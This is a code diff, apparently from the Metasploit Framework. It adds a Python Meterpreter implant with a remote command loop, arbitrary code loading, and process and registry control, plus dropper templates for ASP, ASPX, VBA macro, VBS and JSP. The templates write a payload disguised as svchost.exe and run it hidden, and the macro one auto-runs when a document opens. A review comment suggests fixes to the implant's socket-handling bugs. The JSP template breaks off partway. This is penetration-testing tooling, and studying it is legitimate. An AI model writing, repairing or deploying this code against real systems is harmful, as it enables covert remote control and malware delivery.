+@meterpreter.register_function_windll
759
+def stdapi_registry_enum_value(request, response):
760
+	ERROR_MORE_DATA = 0xea
761
+	ERROR_NO_MORE_ITEMS = 0x0103
762
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
763
+	name = (ctypes.c_char * 4096)()
764
+	name_sz = ctypes.c_uint32()
765
+	index = 0
766
+	tries = 0
767
+	while True:
768
+		name_sz.value = ctypes.sizeof(name)
769
+		result = ctypes.windll.advapi32.RegEnumValueA(hkey, index, name, ctypes.byref(name_sz), None, None, None, None)
770
+		if result == ERROR_MORE_DATA:
771
+			if tries > 3:
772
+				break
773
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 3))
774
+			tries += 1
775
+			continue
776
+		elif result == ERROR_NO_MORE_ITEMS:
777
+			result = ERROR_SUCCESS
778
+			break
779
+		elif result != ERROR_SUCCESS:
780
+			break
781
+		tries = 0
782
+		response += tlv_pack(TLV_TYPE_VALUE_NAME, ctypes.string_at(name))
783
+		index += 1
784
+	return result, response
785
+
786
+@meterpreter.register_function_windll
787
+def stdapi_registry_load_key(request, response):
788
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)
789
+	sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)
790
+	file_name = packet_get_tlv(request, TLV_TYPE_FILE_PATH)
791
+	result = ctypes.windll.advapi32.RegLoadKeyA(root_key, sub_key, file_name)
792
+	return result, response
793
+
794
+@meterpreter.register_function_windll
795
+def stdapi_registry_open_key(request, response):
796
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
797
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
798
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
799
+	handle_id = ctypes.c_void_p()
800
+	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
801
+		response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
802
+		return ERROR_SUCCESS, response
803
+	return ERROR_FAILURE, response
804
+
805
+@meterpreter.register_function_windll
806
+def stdapi_registry_open_remote_key(request, response):
807
+	target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
808
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
809
+	result_key = ctypes.c_void_p()
810
+	result = ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key))
811
+	if (result == ERROR_SUCCESS):
812
+		response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
813
+		return ERROR_SUCCESS, response
814
+	return ERROR_FAILURE, response
815
+
816
+@meterpreter.register_function_windll
817
+def stdapi_registry_query_class(request, response):
818
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
819
+	value_data = (ctypes.c_char * 4096)()
820
+	value_data_sz = ctypes.c_uint32()
821
+	value_data_sz.value = ctypes.sizeof(value_data)
822
+	result = ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None)
823
+	if result == ERROR_SUCCESS:
824
+		response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
825
+		return ERROR_SUCCESS, response
826
+	return ERROR_FAILURE, response
827
+
828
+@meterpreter.register_function_windll
829
+def stdapi_registry_query_value(request, response):
830
+	REG_SZ = 1
831
+	REG_DWORD = 4
832
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
833
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
834
+	value_type = ctypes.c_uint32()
835
+	value_type.value = 0
836
+	value_data = (ctypes.c_ubyte * 4096)()
837
+	value_data_sz = ctypes.c_uint32()
838
+	value_data_sz.value = ctypes.sizeof(value_data)
839
+	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
840
+	if result == ERROR_SUCCESS:
841
+		response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
842
+		if value_type.value == REG_SZ:
843
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
844
+		elif value_type.value == REG_DWORD:
845
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
846
+		else:
847
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
848
+		return ERROR_SUCCESS, response
849
+	return ERROR_FAILURE, response
850
+
851
+@meterpreter.register_function_windll
852
+def stdapi_registry_set_value(request, response):
853
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
854
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
855
+	value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
856
+	value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
857
+	result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
858
+	return result, response
859
+
860
+@meterpreter.register_function_windll
861
+def stdapi_registry_unload_key(request, response):
862
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
863
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
864
+	result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key)
865
+	return result, response

BIN
data/meterpreter/ext_server_stdapi.x64.dll


BIN
data/meterpreter/ext_server_stdapi.x86.dll


BIN
data/meterpreter/meterpreter.jar


+ 415
- 0
data/meterpreter/meterpreter.py

@@ -0,0 +1,415 @@
1
+#!/usr/bin/python
2
+import code
3
+import ctypes
4
+import os
5
+import random
6
+import select
7
+import socket
8
+import struct
9
+import subprocess
10
+import sys
11
+import threading
12
+
13
+has_windll = hasattr(ctypes, 'windll')
14
+
15
+#
16
+# Constants
17
+#
18
+PACKET_TYPE_REQUEST = 0
19
+PACKET_TYPE_RESPONSE = 1
20
+PACKET_TYPE_PLAIN_REQUEST = 10
21
+PACKET_TYPE_PLAIN_RESPONSE = 11
22
+
23
+ERROR_SUCCESS = 0
24
+# not defined in original C implementation
25
+ERROR_FAILURE = 1
26
+
27
+CHANNEL_CLASS_BUFFERED = 0
28
+CHANNEL_CLASS_STREAM = 1
29
+CHANNEL_CLASS_DATAGRAM = 2
30
+CHANNEL_CLASS_POOL = 3
31
+
32
+#
33
+# TLV Meta Types
34
+#
35
+TLV_META_TYPE_NONE =       (   0   )
36
+TLV_META_TYPE_STRING =     (1 << 16)
37
+TLV_META_TYPE_UINT =       (1 << 17)
38
+TLV_META_TYPE_RAW =        (1 << 18)
39
+TLV_META_TYPE_BOOL =       (1 << 19)
40
+TLV_META_TYPE_COMPRESSED = (1 << 29)
41
+TLV_META_TYPE_GROUP =      (1 << 30)
42
+TLV_META_TYPE_COMPLEX =    (1 << 31)
43
+# not defined in original
44
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
45
+
46
+#
47
+# TLV base starting points
48
+#
49
+TLV_RESERVED =   0
50
+TLV_EXTENSIONS = 20000
51
+TLV_USER =       40000
52
+TLV_TEMP =       60000
53
+
54
+#
55
+# TLV Specific Types
56
+#
57
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
58
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
59
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
60
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
61
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
62
+
63
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
64
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
65
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
66
+
67
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
68
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
69
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
70
+
71
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
72
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
73
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
74
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
75
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
76
+
77
+TLV_TYPE_SEEK_WHENCE =         TLV_META_TYPE_UINT   |  70
78
+TLV_TYPE_SEEK_OFFSET =         TLV_META_TYPE_UINT   |  71
79
+TLV_TYPE_SEEK_POS =            TLV_META_TYPE_UINT   |  72
80
+
81
+TLV_TYPE_EXCEPTION_CODE =      TLV_META_TYPE_UINT   | 300
82
+TLV_TYPE_EXCEPTION_STRING =    TLV_META_TYPE_STRING | 301
83
+
84
+TLV_TYPE_LIBRARY_PATH =        TLV_META_TYPE_STRING | 400
85
+TLV_TYPE_TARGET_PATH =         TLV_META_TYPE_STRING | 401
86
+TLV_TYPE_MIGRATE_PID =         TLV_META_TYPE_UINT   | 402
87
+TLV_TYPE_MIGRATE_LEN =         TLV_META_TYPE_UINT   | 403
88
+
89
+TLV_TYPE_CIPHER_NAME =         TLV_META_TYPE_STRING | 500
90
+TLV_TYPE_CIPHER_PARAMETERS =   TLV_META_TYPE_GROUP  | 501
91
+
92
+def generate_request_id():
93
+	chars = 'abcdefghijklmnopqrstuvwxyz'
94
+	return ''.join(random.choice(chars) for x in xrange(32))
95
+
96
+def packet_get_tlv(pkt, tlv_type):
97
+	offset = 0
98
+	while (offset < len(pkt)):
99
+		tlv = struct.unpack('>II', pkt[offset:offset+8])
100
+		if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
101
+			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
102
+			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
103
+				val = val.split('\x00', 1)[0]
104
+			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
105
+				val = struct.unpack('>I', val)[0]
106
+			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
107
+				val = bool(struct.unpack('b', val)[0])
108
+			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
109
+				pass
110
+			return {'type':tlv[1], 'length':tlv[0], 'value':val}
111
+		offset += tlv[0]
112
+	return {}
113
+
114
+def tlv_pack(*args):
115
+	if len(args) == 2:
116
+		tlv = {'type':args[0], 'value':args[1]}
117
+	else:
118
+		tlv = args[0]
119
+	data = ""
120
+	if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
121
+		data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
122
+	elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
123
+		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
124
+	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
125
+		data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
126
+	elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
127
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
128
+	elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
129
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
130
+	elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
131
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
132
+	return data
133
+
134
+class STDProcessBuffer(threading.Thread):
135
+	def __init__(self, std, is_alive):
136
+		threading.Thread.__init__(self)
137
+		self.std = std
138
+		self.is_alive = is_alive
139
+		self.data = ''
140
+		self.data_lock = threading.RLock()
141
+
142
+	def run(self):
143
+		while self.is_alive():
144
+			byte = self.std.read(1)
145
+			self.data_lock.acquire()
146
+			self.data += byte
147
+			self.data_lock.release()
148
+		data = self.std.read()
149
+		self.data_lock.acquire()
150
+		self.data += data
151
+		self.data_lock.release()
152
+
153
+	def is_read_ready(self):
154
+		return len(self.data) != 0
155
+
156
+	def read(self, l = None):
157
+		data = ''
158
+		self.data_lock.acquire()
159
+		if l == None:
160
+			data = self.data
161
+			self.data = ''
162
+		else:
163
+			data = self.data[0:l]
164
+			self.data = self.data[l:]
165
+		self.data_lock.release()
166
+		return data
167
+
168
+class STDProcess(subprocess.Popen):
169
+	def __init__(self, *args, **kwargs):
170
+		subprocess.Popen.__init__(self, *args, **kwargs)
171
+
172
+	def start(self):
173
+		self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
174
+		self.stdout_reader.start()
175
+		self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
176
+		self.stderr_reader.start()
177
+
178
+class PythonMeterpreter(object):
179
+	def __init__(self, socket):
180
+		self.socket = socket
181
+		self.extension_functions = {}
182
+		self.channels = {}
183
+		self.interact_channels = []
184
+		self.processes = {}
185
+		for func in filter(lambda x: x.startswith('_core'), dir(self)):
186
+			self.extension_functions[func[1:]] = getattr(self, func)
187
+		self.running = True
188
+
189
+	def register_function(self, func):
190
+		self.extension_functions[func.__name__] = func
191
+
192
+	def register_function_windll(self, func):
193
+		if has_windll:
194
+			self.register_function(func)
195
+
196
+	def add_channel(self, channel):
197
+		idx = 0
198
+		while idx in self.channels:
199
+			idx += 1
200
+		self.channels[idx] = channel
201
+		return idx
202
+
203
+	def add_process(self, process):
204
+		idx = 0
205
+		while idx in self.processes:
206
+			idx += 1
207
+		self.processes[idx] = process
208
+		return idx
209
+
210
+	def run(self):
211
+		while self.running:
212
+			if len(select.select([self.socket], [], [], 0.5)[0]):
213
+				request = self.socket.recv(8)
214
+				if len(request) != 8:
215
+					break
216
+				req_length, req_type = struct.unpack('>II', request)
217
+				req_length -= 8
218
+				request = ''
219
+				while len(request) < req_length:
220
+					request += self.socket.recv(4096)
221
+				response = self.create_response(request)
222
+				self.socket.send(response)
223
+			else:
224
+				channels_for_removal = []
225
+				channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
226
+				for channel_id in channel_ids:
227
+					channel = self.channels[channel_id]
228
+					data = ''
229
+					if isinstance(channel, STDProcess):
230
+						if not channel_id in self.interact_channels:
231
+							continue
232
+						if channel.stdout_reader.is_read_ready():
233
+							data = channel.stdout_reader.read()
234
+						elif channel.stderr_reader.is_read_ready():
235
+							data = channel.stderr_reader.read()
236
+						elif channel.poll() != None:
237
+							self.handle_dead_resource_channel(channel_id)
238
+					elif isinstance(channel, socket._socketobject):
239
+						while len(select.select([channel.fileno()], [], [], 0)[0]):
240
+							try:
241
+								d = channel.recv(1)
242
+							except socket.error:
243
+								d = ''
244
+							if len(d) == 0:
245
+								self.handle_dead_resource_channel(channel_id)
246
+								break
247
+							data += d
248
+					if data:
249
+						pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
250
+						pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
251
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
252
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
253
+						pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
254
+						pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
255
+						pkt  = struct.pack('>I', len(pkt) + 4) + pkt
256
+						self.socket.send(pkt)
257
+
258
+	def handle_dead_resource_channel(self, channel_id):
259
+		del self.channels[channel_id]
260
+		if channel_id in self.interact_channels:
261
+			self.interact_channels.remove(channel_id)
262
+		pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
263
+		pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
264
+		pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
265
+		pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
266
+		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
267
+		self.socket.send(pkt)
268
+
269
+	def _core_loadlib(self, request, response):
270
+		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
271
+		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
272
+			return ERROR_FAILURE
273
+		preloadlib_methods = self.extension_functions.keys()
274
+		i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
275
+		i.runcode(compile(data_tlv['value'], '', 'exec'))
276
+		postloadlib_methods = self.extension_functions.keys()
277
+		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
278
+		for method in new_methods:
279
+			response += tlv_pack(TLV_TYPE_METHOD, method)
280
+		return ERROR_SUCCESS, response
281
+
282
+	def _core_shutdown(self, request, response):
283
+		response += tlv_pack(TLV_TYPE_BOOL, True)
284
+		self.running = False
285
+		return ERROR_SUCCESS, response
286
+
287
+	def _core_channel_open(self, request, response):
288
+		channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
289
+		handler = 'channel_create_' + channel_type['value']
290
+		if handler not in self.extension_functions:
291
+			return ERROR_FAILURE, response
292
+		handler = self.extension_functions[handler]
293
+		return handler(request, response)
294
+
295
+	def _core_channel_close(self, request, response):
296
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
297
+		if channel_id not in self.channels:
298
+			return ERROR_FAILURE, response
299
+		channel = self.channels[channel_id]
300
+		if isinstance(channel, file):
301
+			channel.close()
302
+		elif isinstance(channel, subprocess.Popen):
303
+			channel.kill()
304
+		elif isinstance(s, socket._socketobject):
305
+			channel.close()
306
+		else:
307
+			return ERROR_FAILURE, response
308
+		del self.channels[channel_id]
309
+		if channel_id in self.interact_channels:
310
+			self.interact_channels.remove(channel_id)
311
+		return ERROR_SUCCESS, response
312
+
313
+	def _core_channel_eof(self, request, response):
314
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
315
+		if channel_id not in self.channels:
316
+			return ERROR_FAILURE, response
317
+		channel = self.channels[channel_id]
318
+		result = False
319
+		if isinstance(channel, file):
320
+			result = channel.tell() == os.fstat(channel.fileno()).st_size
321
+		response += tlv_pack(TLV_TYPE_BOOL, result)
322
+		return ERROR_SUCCESS, response
323
+
324
+	def _core_channel_interact(self, request, response):
325
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
326
+		if channel_id not in self.channels:
327
+			return ERROR_FAILURE, response
328
+		channel = self.channels[channel_id]
329
+		toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
330
+		if toggle:
331
+			if channel_id in self.interact_channels:
332
+				self.interact_channels.remove(channel_id)
333
+			else:
334
+				self.interact_channels.append(channel_id)
335
+		elif channel_id in self.interact_channels:
336
+			self.interact_channels.remove(channel_id)
337
+		return ERROR_SUCCESS, response
338
+
339
+	def _core_channel_read(self, request, response):
340
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
341
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
342
+		if channel_id not in self.channels:
343
+			return ERROR_FAILURE, response
344
+		channel = self.channels[channel_id]
345
+		data = ''
346
+		if isinstance(channel, file):
347
+			data = channel.read(length)
348
+		elif isinstance(channel, STDProcess):
349
+			if channel.poll() != None:
350
+				self.handle_dead_resource_channel(channel_id)
351
+			if channel.stdout_reader.is_read_ready():
352
+				data = channel.stdout_reader.read(length)
353
+		elif isinstance(s, socket._socketobject):
354
+			data = channel.recv(length)
355
+		else:
356
+			return ERROR_FAILURE, response
357
+		response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
358
+		return ERROR_SUCCESS, response
359
+
360
+	def _core_channel_write(self, request, response):
361
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
362
+		channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
363
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
364
+		if channel_id not in self.channels:
365
+			return ERROR_FAILURE, response
366
+		channel = self.channels[channel_id]
367
+		l = len(channel_data)
368
+		if isinstance(channel, file):
369
+			channel.write(channel_data)
370
+		elif isinstance(channel, subprocess.Popen):
371
+			if channel.poll() != None:
372
+				self.handle_dead_resource_channel(channel_id)
373
+				return ERROR_FAILURE, response
374
+			channel.stdin.write(channel_data)
375
+		elif isinstance(s, socket._socketobject):
376
+			try:
377
+				l = channel.send(channel_data)
378
+			except socket.error:
379
+				channel.close()
380
+				self.handle_dead_resource_channel(channel_id)
381
+				return ERROR_FAILURE, response
382
+		else:
383
+			return ERROR_FAILURE, response
384
+		response += tlv_pack(TLV_TYPE_LENGTH, l)
385
+		return ERROR_SUCCESS, response
386
+
387
+	def create_response(self, request):
388
+		resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
389
+		method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
390
+		resp += tlv_pack(method_tlv)
391
+
392
+		reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
393
+		resp += tlv_pack(reqid_tlv)
394
+
395
+		handler_name = method_tlv['value']
396
+		if handler_name in self.extension_functions:
397
+			handler = self.extension_functions[handler_name]
398
+			try:
399
+				#print("[*] running method {0}".format(handler_name))
400
+				result, resp = handler(request, resp)
401
+			except Exception, err:
402
+				#print("[-] method {0} resulted in an error".format(handler_name))
403
+				result = ERROR_FAILURE
404
+		else:
405
+			#print("[-] method {0} was requested but does not exist".format(handler_name))
406
+			result = ERROR_FAILURE
407
+		resp += tlv_pack(TLV_TYPE_RESULT, result)
408
+		resp = struct.pack('>I', len(resp) + 4) + resp
409
+		return resp
410
+
411
+if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
412
+	if hasattr(os, 'setsid'):
413
+		os.setsid()
414
+	met = PythonMeterpreter(s)
415
+	met.run()
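Review bot: `_core_channel_close`, `_core_channel_read` and `_core_channel_write` test `isinstance(s, socket._socketobject)`, but `s` is neither a parameter nor a local of those methods, so a socket channel reaching that `elif` raises NameError instead of taking the socket branch (`s` is only referenced at module level in `PythonMeterpreter(s)`). `create_response` then catches it as a generic `Exception` with its diagnostic print commented out, so the fault is reported as a plain ERROR_FAILURE and is indistinguishable from a legitimate one. The check should read `elif isinstance(channel, socket._socketobject):` in all three places. Separately, `_core_loadlib` returns a bare `ERROR_FAILURE` on the compressed-data path rather than the `(result, response)` tuple every other handler returns and `create_response` unpacks.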

BIN
data/meterpreter/metsrv.dll View File


BIN
data/meterpreter/metsrv.x64.dll View File


BIN
data/meterpreter/metsrv.x86.dll View File


BIN
data/meterpreter/screenshot.dll View File


BIN
data/meterpreter/screenshot.x64.dll View File


BIN
data/meterpreter/screenshot.x86.dll View File


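--- a/data/templates/scripts/to_exe.asp.template
+++ b/data/templates/scripts/to_exe.asp.template
@@ -0,0 +1,24 @@
+<%% @language="VBScript" %%>
+<%% 
+	Sub %{var_func}()
+		%{var_shellcode}
+		Dim %{var_obj}
+		Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+		Dim %{var_stream}
+		Dim %{var_tempdir}
+		Dim %{var_tempexe}
+		Dim %{var_basedir}
+		Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+		%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+		%{var_obj}.CreateFolder(%{var_basedir})
+		%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+		Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
+		%{var_stream}.Write %{var_bytes}
+		%{var_stream}.Close
+		Dim %{var_shell}
+		Set %{var_shell} = CreateObject("Wscript.Shell")
+		%{var_shell}.run %{var_tempexe}, 0, false
+	End Sub
+
+	%{var_func}
+%%>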

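--- a/data/templates/scripts/to_exe.aspx.template
+++ b/data/templates/scripts/to_exe.aspx.template
@@ -0,0 +1,30 @@
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
+<script runat="server">
+	protected void Page_Load(object sender, EventArgs e)
+	{
+		%{shellcode}
+		string %{var_tempdir} = Path.GetTempPath();
+		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
+		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
+		
+		Directory.CreateDirectory(%{var_basedir});
+		
+		FileStream fs = File.Create(%{var_tempexe});
+		
+		try
+		{
+			fs.Write(%{var_file}, 0, %{var_file}.Length);
+		}
+		finally
+		{
+			if (fs != null) ((IDisposable)fs).Dispose();
+		}
+
+		System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
+		%{var_proc}.StartInfo.CreateNoWindow = true;
+		%{var_proc}.StartInfo.UseShellExecute = true;
+		%{var_proc}.StartInfo.FileName = %{var_tempexe};
+		%{var_proc}.Start();
+	}
+</script>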

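--- a/data/templates/scripts/to_exe.vba.template
+++ b/data/templates/scripts/to_exe.vba.template
@@ -0,0 +1,81 @@
+'**************************************************************
+'*
+'* This code is now split into two pieces:
+'*  1. The Macro. This must be copied into the Office document
+'*     macro editor. This macro will run on startup.
+'*
+'*  2. The Data. The hex dump at the end of this output must be
+'*     appended to the end of the document contents.
+'*
+'**************************************************************
+'*
+'* MACRO CODE
+'*
+'**************************************************************
+
+Sub Auto_Open()
+	%{func_name1}
+End Sub
+
+Sub %{func_name1}()
+	Dim %{var_appnr} As Integer
+	Dim %{var_fname} As String
+	Dim %{var_fenvi} As String
+	Dim %{var_fhand} As Integer
+	Dim %{var_parag} As Paragraph
+	Dim %{var_index} As Integer
+	Dim %{var_gotmagic} As Boolean
+	Dim %{var_itemp} As Integer
+	Dim %{var_stemp} As String
+	Dim %{var_btemp} As Byte
+	Dim %{var_magic} as String
+	%{var_magic} = "%{var_magic}"
+	%{var_fname} = "%(unknown).exe"
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_fhand} = FreeFile()
+	Open %{var_fname} For Binary As %{var_fhand}
+	For Each %{var_parag} in ActiveDocument.Paragraphs
+		DoEvents
+			%{var_stemp} = %{var_parag}.Range.Text
+		If (%{var_gotmagic} = True) Then
+			%{var_index} = 1
+			While (%{var_index} < Len(%{var_stemp}))
+				%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
+				Put #%{var_fhand}, , %{var_btemp}
+				%{var_index} = %{var_index} + 4
+			Wend
+		ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
+			%{var_gotmagic} = True
+		End If
+	Next
+	Close #%{var_fhand}
+	%{func_name2}(%{var_fname})
+End Sub
+
+Sub %{func_name2}(%{var_farg} As String)
+	Dim %{var_appnr} As Integer
+	Dim %{var_fenvi} As String
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_appnr} = Shell(%{var_farg}, vbHide)
+End Sub
+
+Sub AutoOpen()
+	Auto_Open
+End Sub
+
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+
+'**************************************************************
+'*
+'* PAYLOAD DATA
+'*
+'**************************************************************
+
+%{var_magic}
+%{data}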

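--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -0,0 +1,24 @@
+Function %{var_func}()
+%{var_shellcode}
+
+	Dim %{var_obj}
+	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
+	Dim %{var_tempdir}
+	Dim %{var_tempexe}
+	Dim %{var_basedir}
+	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	%{var_stream}.Write %{var_bytes}
+	%{var_stream}.Close
+	Dim %{var_shell}
+	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run %{var_tempexe}, 0, true
+	%{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFolder(%{var_basedir})
+End Function
+
+%{init}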

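--- a/data/templates/scripts/to_exe_jsp.war.template
+++ b/data/templates/scripts/to_exe_jsp.war.template
@@ -0,0 +1,49 @@
+<%%@ page import="java.io.*" %%>
+<%%
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+	String %{var_data} = "";
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+	{
+		%{var_exepath} = %{var_exepath}.concat(".exe");
+	}
+
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+	int %{var_numbytes} = %{var_inputstream}.available();
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+	%{var_inputstream}.read(%{var_bytearray});
+	%{var_inputstream}.close();
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+	{
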